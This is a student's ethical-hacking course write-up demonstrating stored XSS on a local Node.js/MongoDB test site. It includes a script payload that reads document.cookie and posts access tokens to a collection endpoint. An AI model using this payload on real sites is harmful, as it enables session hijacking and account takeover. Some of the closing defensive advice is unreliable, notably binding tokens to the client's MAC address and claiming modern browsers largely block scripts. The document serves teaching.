Ethical Hacking course project by @Sajjad-Hasan01, Dec-2023
These days, there are many ways to steal clients' information, one of them is Cross-Site-Scripting (XSS) with Database Inject. In this project, I will present the easiest way to pass a script command and the basics to avoid these issues.
When a hacker can write any command in a regular input field and pass it as well, this is a very big issue, because the hacker can exploit this vulnerability in malicious ways. One of the malicious scenarios, inject a script that takes Cookies of the client from the browser window and sends them to his database.
The Cookies may contain AccessToken of the client’s session, and this will take the hacker to open a client’s account. I will discuss the solution to this problem later.
This is a general problem. In this project, I implement the problem practically by using Node.js as JavaScript runtime environment, MongoDB as database, and Postman as api for sending and receiving HTTP-Requests, all services are locally. Will see it in the next paragraph.
Firstly, let’s signup and login to the local test website:
Now, I’ll try to exploit the Add Comment field to pass an injection:
As you can see in second and fourth images, the script works well and the browser shows the alerts.
If the client side catches the script and converts it to normal string or rejects it, there is another way to pass throw directly to API by using Postman. Now, I should get the Add-Comment API link:
From browser developer tools, I tried to get the request link from Network tap, but after every button click the page refresh itself.
The Add-Comment API link is http://localhost:3000/api/addcomment , and body of request is comment
In Postman, I sent a body contains a script that take Cookies from client’s browser window and sent it to a database collection:
<script>
(() => {
fetch('http://localhost:3000/api/xss',{
method:'POST',
headers: {
"Content-Type": "application/json",
},
body: JSON.stringify({
token: document.cookie
})
})
})()
</script>
The response status was OK, and after refreshing the Home page, it displayed another empty comment which was my Send-Cookie-Script. Finally, I got the Cookie that contains AccessToken in my Tokens collection of eHackXss database:
To avoid NoSQL Injection, we have to use mongoose Node Package Modal (NPM) rather than mongodb and Express-Mongo-Sanitize, and helmet for secure HTTP Header, XSS-Clean for data sanitization against site script, Yup for input validation in the server. And the earliest versions of browsers have good ways to avoid scripts, now, it’s difficult to operate any script on a browser window.
Later, I will upgrade the project with implementation of an unusable AccessToken which contains AccountID and MAC Address of the user's device. So, when the attacker gets the AccessToken and tries to use it, the server will receive the MAC Address of the attacker and extract the MAC Address of the legal user from AccessToken then compare between them.